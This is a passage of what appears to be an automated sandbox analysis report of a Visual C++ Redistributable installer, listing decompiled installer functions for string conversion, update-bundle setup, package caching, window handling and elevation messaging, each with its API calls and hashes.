                                                                          									E000491C7(_t100);
                                                                          									goto L36;
                                                                          								}
                                                                          								_t62 = E00048969(_t81, _t87, _t100, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
                                                                          								__eflags = _t62;
                                                                          								if(_t62 == 0) {
                                                                          									goto L35;
                                                                          								}
                                                                          								_push(0);
                                                                          								_push(0);
                                                                          								__eflags = _a28;
                                                                          								if(_a28 != 0) {
                                                                          									_push(_a28);
                                                                          									_push(_a24);
                                                                          								} else {
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          								}
                                                                          								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
                                                                          								__eflags = _t104;
                                                                          								if(_t104 != 0) {
                                                                          									E000491C7(_t100);
                                                                          									goto L37;
                                                                          								} else {
                                                                          									goto L35;
                                                                          								}
                                                                          							}
                                                                          							_t90 = _t95 + 8;
                                                                          							__eflags = _t95 - _t90;
                                                                          							asm("sbb eax, eax");
                                                                          							_t66 = _t60 & _t90;
                                                                          							_t87 = _t95 + 8;
                                                                          							__eflags = _t66 - 0x400;
                                                                          							if(_t66 > 0x400) {
                                                                          								__eflags = _t95 - _t87;
                                                                          								asm("sbb eax, eax");
                                                                          								_t100 = E00045154(_t87, _t66 & _t87);
                                                                          								_pop(_t87);
                                                                          								__eflags = _t100;
                                                                          								if(_t100 == 0) {
                                                                          									goto L35;
                                                                          								}
                                                                          								 *_t100 = 0xdddd;
                                                                          								L28:
                                                                          								_t100 =  &(_t100[4]);
                                                                          								goto L30;
                                                                          							}
                                                                          							__eflags = _t95 - _t87;
                                                                          							asm("sbb eax, eax");
                                                                          							E00059DF0();
                                                                          							_t100 = _t106;
                                                                          							__eflags = _t100;
                                                                          							if(_t100 == 0) {
                                                                          								goto L35;
                                                                          							}
                                                                          							 *_t100 = 0xcccc;
                                                                          							goto L28;
                                                                          						}
                                                                          						_t70 = _a28;
                                                                          						if(_t70 == 0) {
                                                                          							goto L37;
                                                                          						}
                                                                          						_t124 = _t104 - _t70;
                                                                          						if(_t104 > _t70) {
                                                                          							goto L36;
                                                                          						}
                                                                          						_t71 = E00048969(_t81, 0, _t99, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
                                                                          						_t104 = _t71;
                                                                          						if(_t71 != 0) {
                                                                          							goto L37;
                                                                          						}
                                                                          						goto L36;
                                                                          					}
                                                                          					asm("sbb eax, eax");
                                                                          					_t72 = _t54 & _t95 + 0x00000008;
                                                                          					_t85 = _t95 + 8;
                                                                          					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                          						__eflags = _t95 - _t85;
                                                                          						asm("sbb eax, eax");
                                                                          						_t81 = E00045154(_t85, _t72 & _t85);
                                                                          						_pop(_t85);
                                                                          						__eflags = _t81;
                                                                          						if(__eflags == 0) {
                                                                          							goto L36;
                                                                          						}
                                                                          						 *_t81 = 0xdddd;
                                                                          						L12:
                                                                          						_t81 =  &(_t81[4]);
                                                                          						goto L14;
                                                                          					}
                                                                          					asm("sbb eax, eax");
                                                                          					E00059DF0();
                                                                          					_t81 = _t106;
                                                                          					if(_t81 == 0) {
                                                                          						goto L36;
                                                                          					}
                                                                          					 *_t81 = 0xcccc;
                                                                          					goto L12;
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00043382,00043382,?,?,?,0004A2AA,00000001,00000001,E3E85006), ref: 0004A0B3
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0004A2AA,00000001,00000001,E3E85006,?,?,?), ref: 0004A139
                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,E3E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0004A233
                                                                          • __freea.LIBCMT ref: 0004A240
                                                                            • Part of subcall function 00045154: HeapAlloc.KERNEL32(00000000,?,?,?,00041E90,?,0000015D,?,?,?,?,000432E9,000000FF,00000000,?,?), ref: 00045186
                                                                          • __freea.LIBCMT ref: 0004A249
                                                                          • __freea.LIBCMT ref: 0004A26E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 3147120248-0
                                                                          • Opcode ID: b1ae6988368bb28bac7685b5c85c6eae5a76d9a76d9ad07e0d7b5e6f499e819c
                                                                          • Instruction ID: ef813050570518af4066906882bd15e3f75dde1236cda2c9271930218f519b2f
                                                                          • Opcode Fuzzy Hash: b1ae6988368bb28bac7685b5c85c6eae5a76d9a76d9ad07e0d7b5e6f499e819c
                                                                          • Instruction Fuzzy Hash: 855123B2740206AFEB258F68CD81EBF77A9EB46750F144238FC04E6191EB75DC40D669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E0002F6B8(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				intOrPtr* _t43;
                                                                          				intOrPtr _t50;
                                                                          				intOrPtr* _t66;
                                                                          				void* _t71;
                                                                          				intOrPtr _t76;
                                                                          				char _t79;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_t76 = _a4;
                                                                          				_t79 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				EnterCriticalSection( *(_t76 + 0xc));
                                                                          				_t66 = _a8;
                                                                          				if(_t66 == 0 ||  *_t66 == 0) {
                                                                          					_t43 = _a12;
                                                                          					if(_t43 == 0 ||  *_t43 == 0) {
                                                                          						E0001E79A(_t66, 0, _t76,  *(_t76 + 0xc) + 0x2f0);
                                                                          					} else {
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					L4:
                                                                          					_t50 = _a28;
                                                                          					if(_a24 != _t79) {
                                                                          						if(_a24 != 1 || _a32 == 0x14 && _t50 != 0) {
                                                                          							goto L7;
                                                                          						} else {
                                                                          							goto L15;
                                                                          						}
                                                                          					} else {
                                                                          						if(_a32 != _t79 || _t50 != 0) {
                                                                          							L15:
                                                                          							_t79 = 0x80070057;
                                                                          						} else {
                                                                          							L7:
                                                                          							E0001E79A(_t66, 0, _t76,  *(_t76 + 0xc) + 0x2f0);
                                                                          							if(_t66 == 0) {
                                                                          								L9:
                                                                          								if(E00011F20( &_v8, L"update\\%ls",  *((intOrPtr*)( *(_t76 + 0xc) + 0x148))) >= 0) {
                                                                          									_t71 = 0;
                                                                          									goto L17;
                                                                          								} else {
                                                                          									_push("Failed to default local update source");
                                                                          									goto L11;
                                                                          								}
                                                                          							} else {
                                                                          								_t71 = 0;
                                                                          								if( *_t66 != 0) {
                                                                          									L17:
                                                                          									if(E00027C29(_t71,  &_v12, 5,  *((intOrPtr*)( *(_t76 + 0xc) + 0x20)),  *((intOrPtr*)( *(_t76 + 0xc) + 0x24)), _t71, _t71,  *((intOrPtr*)( *(_t76 + 0xc) + 0x140)),  *((intOrPtr*)(_t57 + 0x1c0)), _t71,  *((intOrPtr*)(_t57 + 0x28))) >= 0) {
                                                                          										_t60 =  *(_t76 + 0xc);
                                                                          										_t68 =  !=  ? _v8 : _t66;
                                                                          										_t79 = E0003C0FA( !=  ? _v8 : _t66, 0, _t76, 0x126e0000, 0x3000a,  *(_t76 + 0xc) + 0x2f8, 0,  *((intOrPtr*)( *(_t76 + 0xc) + 0x110)), 6, 2,  *((intOrPtr*)(_t60 + 0x148)),  !=  ? _v8 : _t66, _a12, _a16, _a20, 1, _v12, 0, 0, 0, _a28, _a32);
                                                                          										if(_t79 >= 0) {
                                                                          											 *((intOrPtr*)( *(_t76 + 0xc) + 0x2f0)) = 1;
                                                                          										} else {
                                                                          											_push("Failed to set update bundle.");
                                                                          											goto L11;
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to recreate command-line for update bundle.");
                                                                          										L11:
                                                                          										_push(_t79);
                                                                          										E0005012F();
                                                                          									}
                                                                          								} else {
                                                                          									goto L9;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				LeaveCriticalSection( *(_t76 + 0xc));
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t79;
                                                                          			}


                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0002F6D0
                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 0002F81D
                                                                          Strings
                                                                          • Failed to recreate command-line for update bundle., xrefs: 0002F79C
                                                                          • Failed to default local update source, xrefs: 0002F742
                                                                          • update\%ls, xrefs: 0002F72E
                                                                          • Failed to set update bundle., xrefs: 0002F7F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                          • API String ID: 3168844106-1266646976
                                                                          • Opcode ID: b91a1701a22ceb440421fa53fbcc516ee10f1cc17c0f68a7819e7521f57c616a
                                                                          • Instruction ID: 3427fd82d300035d7ee0da6564e952b29256f83529cef1db3c654052c7924cde
                                                                          • Opcode Fuzzy Hash: b91a1701a22ceb440421fa53fbcc516ee10f1cc17c0f68a7819e7521f57c616a
                                                                          • Instruction Fuzzy Hash: 7741AC3190422AEFDF219F94EC46EBAB7B9EF04390F014279F908A7161D771AC508B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E00028AA3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t24;
                                                                          				void* _t29;
                                                                          				signed int _t50;
                                                                          				void* _t57;
                                                                          				void* _t62;
                                                                          				void* _t63;
                                                                          
                                                                          				_t57 = __edx;
                                                                          				_t52 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t59 = _a8;
                                                                          				_t24 = E0002A189(__ecx, _a8, _a16,  &_v12);
                                                                          				_t50 = _v12;
                                                                          				_t62 = _t24;
                                                                          				if(_t62 >= 0) {
                                                                          					_push(_t50);
                                                                          					E0001550F(2, (0 | _a4 != 0x00000000) + 0x2000015f, _a12);
                                                                          					_t29 = 0x80004005;
                                                                          					_t63 = 0;
                                                                          					while(_t63 < 3) {
                                                                          						if(_t63 != 0) {
                                                                          							Sleep(0x7d0);
                                                                          						}
                                                                          						_t29 = E00013BC3(_t57, _t50, 7);
                                                                          						if(_t29 != 0x80070003) {
                                                                          							_t63 = _t63 + 1;
                                                                          							if(_t29 < 0) {
                                                                          								continue;
                                                                          							}
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					if(_t29 >= 0) {
                                                                          						_t62 = E0002886A(_t52, _t59, 1,  &_v8);
                                                                          						if(_t62 >= 0) {
                                                                          							E00013BC3(_t57, _v8, 4);
                                                                          							if(_t62 == 1) {
                                                                          								_t62 = E0002886A(_t52, _t59, 0,  &_v8);
                                                                          								if(_t62 >= 0) {
                                                                          									E00013BC3(_t57, _v8, 4);
                                                                          								} else {
                                                                          									_t40 =  ==  ? "per-user" : "per-machine";
                                                                          									_push( ==  ? "per-user" : "per-machine");
                                                                          									_push("Failed to get old %hs package cache root directory.");
                                                                          									goto L12;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t43 =  ==  ? "per-user" : "per-machine";
                                                                          							_push( ==  ? "per-user" : "per-machine");
                                                                          							_push("Failed to get %hs package cache root directory.");
                                                                          							L12:
                                                                          							_push(_t62);
                                                                          							E0005012F();
                                                                          						}
                                                                          					} else {
                                                                          						_push(_t29);
                                                                          						_push(_t50);
                                                                          						E0001550F(2, (0 | _a4 != 0x00000000) + 0xa0000161, _a12);
                                                                          						_t62 = 0;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to calculate cache path.");
                                                                          					_push(_t62);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_t50 != 0) {
                                                                          					E000554EF(_t50);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t62;
                                                                          			}












                                                                          APIs
                                                                          • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00028B0F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                          • API String ID: 3472027048-398165853
                                                                          • Opcode ID: bc17d000b0480436d0789c096c371ee95944d9ba91bee7e3097960e3654192a0
                                                                          • Instruction ID: 12253491e09face7b08da871fe16d7d81ff27fce6d4dbd571bfc431e918a8524
                                                                          • Opcode Fuzzy Hash: bc17d000b0480436d0789c096c371ee95944d9ba91bee7e3097960e3654192a0
                                                                          • Instruction Fuzzy Hash: 3931E6B6A02239BBEB12AA549C47FBFB65DDF00711F004029FE05EA242DF758E405791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 33%
                                                                          			E000121BC(signed int __edx, intOrPtr* _a4, char* _a8, signed int _a12, int _a16) {
                                                                          				signed int _t17;
                                                                          				unsigned int _t18;
                                                                          				signed int _t19;
                                                                          				signed short _t24;
                                                                          				intOrPtr _t25;
                                                                          				signed short _t31;
                                                                          				signed int _t34;
                                                                          				int _t36;
                                                                          				char* _t38;
                                                                          				void* _t39;
                                                                          				intOrPtr _t41;
                                                                          				intOrPtr _t42;
                                                                          				int _t44;
                                                                          				unsigned int _t46;
                                                                          				intOrPtr* _t47;
                                                                          				unsigned int _t49;
                                                                          				int _t51;
                                                                          
                                                                          				_t37 = _a4;
                                                                          				_t44 = __edx | 0xffffffff;
                                                                          				_t17 = _a12;
                                                                          				_t51 = 0;
                                                                          				_t34 = _t17;
                                                                          				_t46 = 0;
                                                                          				if( *_a4 == 0) {
                                                                          					L4:
                                                                          					_t38 = _a8;
                                                                          					if(_t17 != 0) {
                                                                          						if(_t38[_t17] == 0) {
                                                                          							_t34 = _t17 - 1;
                                                                          						}
                                                                          						L11:
                                                                          						_t18 = _t34 + 1;
                                                                          						if(_t46 >= _t18) {
                                                                          							L20:
                                                                          							_t19 = _a12;
                                                                          							_push(_t46);
                                                                          							_t47 = _a4;
                                                                          							_push( *_t47);
                                                                          							_t39 = 0xffffffff;
                                                                          							_t20 =  ==  ? _t39 : _t19;
                                                                          							if(MultiByteToWideChar(_a16, _t51, _a8,  ==  ? _t39 : _t19, ??, ??) != 0) {
                                                                          								 *((short*)( *_t47 + _t34 * 2)) = 0;
                                                                          								L23:
                                                                          								return _t51;
                                                                          							}
                                                                          							_t24 = GetLastError();
                                                                          							_t55 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          							_t25 = 0x80004005;
                                                                          							_t51 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t51);
                                                                          							_push(0x22f);
                                                                          							L7:
                                                                          							_push("strutil.cpp");
                                                                          							E000137D3(_t25);
                                                                          							goto L23;
                                                                          						}
                                                                          						_t46 = _t18;
                                                                          						if(_t46 < 0x7fffffff) {
                                                                          							_push(1);
                                                                          							_t41 =  *_a4;
                                                                          							_push(_t46 + _t46);
                                                                          							if(_t41 == 0) {
                                                                          								_t25 = E000138D4();
                                                                          							} else {
                                                                          								_push(_t41);
                                                                          								_t25 = E00013A72();
                                                                          							}
                                                                          							_t42 = _t25;
                                                                          							if(_t42 != 0) {
                                                                          								 *_a4 = _t42;
                                                                          								goto L20;
                                                                          							} else {
                                                                          								_t51 = 0x8007000e;
                                                                          								_push(0x8007000e);
                                                                          								_push(0x228);
                                                                          								goto L7;
                                                                          							}
                                                                          						}
                                                                          						_t51 = 0x8007000e;
                                                                          						goto L23;
                                                                          					}
                                                                          					_t36 = MultiByteToWideChar(_a16, _t51, _t38, _t44, _t51, _t51);
                                                                          					if(_t36 != 0) {
                                                                          						_t34 = _t36 - 1;
                                                                          						goto L11;
                                                                          					}
                                                                          					_t31 = GetLastError();
                                                                          					_t58 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          					_t25 = 0x80004005;
                                                                          					_t51 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t51);
                                                                          					_push(0x20c);
                                                                          					goto L7;
                                                                          				}
                                                                          				_t49 = E00013B51( *_t37);
                                                                          				_t44 = _t44 | 0xffffffff;
                                                                          				if(_t49 != _t44) {
                                                                          					_t46 = _t49 >> 1;
                                                                          					_t17 = _t34;
                                                                          					goto L4;
                                                                          				}
                                                                          				_t51 = 0x80070057;
                                                                          				goto L23;
                                                                          			}

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00012202
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 0001220E
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3662877508-569070560
                                                                          • Opcode ID: 445c6535fab9ef9c3cfa2c1752fd1fd109167f4dc142bd7405c3d3277f69ed5a
                                                                          • Instruction ID: 845d747c1e6f5042c6ce817e3234d00bae538778ab1af87e00e807047c9ea355
                                                                          • Opcode Fuzzy Hash: 445c6535fab9ef9c3cfa2c1752fd1fd109167f4dc142bd7405c3d3277f69ed5a
                                                                          • Instruction Fuzzy Hash: E231D832700216BBEB249AA9CC44AEF77D9EF45764B114229FD15DB2E0EB35DC90C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			E0002E705(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                                                          				int _t22;
                                                                          				void* _t24;
                                                                          				long _t25;
                                                                          				void* _t34;
                                                                          				long _t38;
                                                                          				void* _t42;
                                                                          				void* _t45;
                                                                          				intOrPtr* _t47;
                                                                          				signed int _t50;
                                                                          				long _t53;
                                                                          
                                                                          				_t22 = _a8;
                                                                          				if(_t22 == 0) {
                                                                          					PostQuitMessage(0);
                                                                          					return 0;
                                                                          				}
                                                                          				_t24 = _t22 - 0xf;
                                                                          				if(_t24 == 0) {
                                                                          					_t42 = 0;
                                                                          					_t50 = _a16 & 0x40000000;
                                                                          					_t25 = GetWindowLongW(_a4, 0xffffffeb);
                                                                          					_a4 = _t25;
                                                                          					if( *_t25 == 0) {
                                                                          						_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)) + 0x10));
                                                                          						_t45 = 2;
                                                                          						_t46 =  !=  ? 0 : _t45;
                                                                          						 *((intOrPtr*)( *_t47 + 0x14))(_t47, _a16,  !=  ? 0 : _t45);
                                                                          						_t42 = 0xbadbad;
                                                                          					}
                                                                          					_push(E00023C30(_t42));
                                                                          					_push(E00023C30(_a4->i));
                                                                          					E0001550F(2, 0x20000190, E00023C30(_t50));
                                                                          					return _t42;
                                                                          				}
                                                                          				_t53 = _a16;
                                                                          				_t34 = _t24 - 0x70;
                                                                          				if(_t34 == 0) {
                                                                          					SetWindowLongW(_a4, 0xffffffeb,  *_t53);
                                                                          					L6:
                                                                          					return DefWindowProcW(_a4, _a8, _a12, _t53);
                                                                          				}
                                                                          				if(_t34 != 1) {
                                                                          					goto L6;
                                                                          				}
                                                                          				_t38 = DefWindowProcW(_a4, 0x82, _a12, _t53);
                                                                          				SetWindowLongW(_a4, 0xffffffeb, 0);
                                                                          				return _t38;
                                                                          			}

                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 0002E734
                                                                          • SetWindowLongW.USER32 ref: 0002E743
                                                                          • SetWindowLongW.USER32 ref: 0002E757
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 0002E767
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0002E781
                                                                          • PostQuitMessage.USER32(00000000), ref: 0002E7DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Proc$MessagePostQuit
                                                                          • String ID:
                                                                          • API String ID: 3812958022-0
                                                                          • Opcode ID: 8b269111d3fff172e37ee2a555bf6d910aec2fe5eb30aa02656549d02b4995a7
                                                                          • Instruction ID: 0cb61aecaa5cc3d15ab2ee7a3c5fd02547ad9e04a3b3bb4a28a789673a9e8dae
                                                                          • Opcode Fuzzy Hash: 8b269111d3fff172e37ee2a555bf6d910aec2fe5eb30aa02656549d02b4995a7
                                                                          • Instruction Fuzzy Hash: 0521A132148228BFEB115FA4EC48EAF3BA9EF45351F148564F906AA1B1C735ED10DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 90%
                                                                          			E0002C59C(void* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, intOrPtr* _a12) {
                                                                          				signed int _t87;
                                                                          				void* _t96;
                                                                          
                                                                          				_t97 = _a4;
                                                                          				_t96 = 0;
                                                                          				_t87 =  *_a4 - 1;
                                                                          				if(_t87 > 0x13) {
                                                                          					L23:
                                                                          					_t96 = 0x80070057;
                                                                          					E000137D3(_t87, "elevation.cpp", 0x5e4, 0x80070057);
                                                                          					E0005012F(0x80070057, "Unexpected elevated message sent to child process, msg: %u",  *_t97);
                                                                          					L24:
                                                                          					return _t96;
                                                                          				}
                                                                          				switch( *((intOrPtr*)(_t87 * 4 +  &M0002C7AC))) {
                                                                          					case 0:
                                                                          						_t92 = E0002AEB2(__ecx, __edx, _t101,  *((intOrPtr*)(_a8 + 0x20)),  *((intOrPtr*)(_a8 + 0x24)),  *((intOrPtr*)(_t91 + 8)),  *((intOrPtr*)(_t91 + 0xc)),  *((intOrPtr*)(_t97 + 0xc)),  *((intOrPtr*)(_t97 + 4)));
                                                                          						goto L21;
                                                                          					case 1:
                                                                          						__eax = _a8;
                                                                          						__esi =  *(_a8 + 8);
                                                                          						__eflags =  *__esi;
                                                                          						if( *__esi != 0) {
                                                                          							ReleaseMutex( *__esi) = CloseHandle( *__esi);
                                                                          							 *__esi = 0;
                                                                          						}
                                                                          						__esi = __edi;
                                                                          						goto L22;
                                                                          					case 2:
                                                                          						_a8 = E0002C29D(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)),  *((intOrPtr*)(__eax + 0x20)),  *((intOrPtr*)(__eax + 0x28)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 3:
                                                                          						_a8 = E0002C484(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 4:
                                                                          						_a8 = E0002C3DF(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 5:
                                                                          						__eax = _a8;
                                                                          						__esi = E0001FDDF(__ecx,  *((intOrPtr*)(_a8 + 0x24)), __esi[3], __esi[1]);
                                                                          						__eflags = __esi;
                                                                          						if(__esi < 0) {
                                                                          							_push("Failed to save state.");
                                                                          							_push(__esi);
                                                                          							__eax = E0005012F();
                                                                          							_pop(__ecx);
                                                                          							_pop(__ecx);
                                                                          						}
                                                                          						goto L22;
                                                                          					case 6:
                                                                          						goto L23;
                                                                          					case 7:
                                                                          						_a8 = E0002C1D8(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 8:
                                                                          						__ecx = _a8;
                                                                          						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 0xb4;
                                                                          						__eax = L0002B35A(__ecx, __edx, __eflags,  *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(__ecx + 0x18)),  *((intOrPtr*)(__ecx + 0x24)) + 0xb4,  *((intOrPtr*)(__ecx + 0x20)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 9:
                                                                          						_a8 = E0002B561(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x18)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0xa:
                                                                          						_a8 = E0002B813(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x18)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0xb:
                                                                          						_a8 = E0002BAB9(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x18)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0xc:
                                                                          						__ecx = _a8;
                                                                          						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 0xb4;
                                                                          						__eax = E0002BD23(__ecx, __edi, __eflags,  *((intOrPtr*)(__ecx + 0x18)),  *((intOrPtr*)(__ecx + 0x24)) + 0xb4, __esi[3], __esi[1]);
                                                                          						goto L21;
                                                                          					case 0xd:
                                                                          						__ecx = _a8;
                                                                          						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 0xb4;
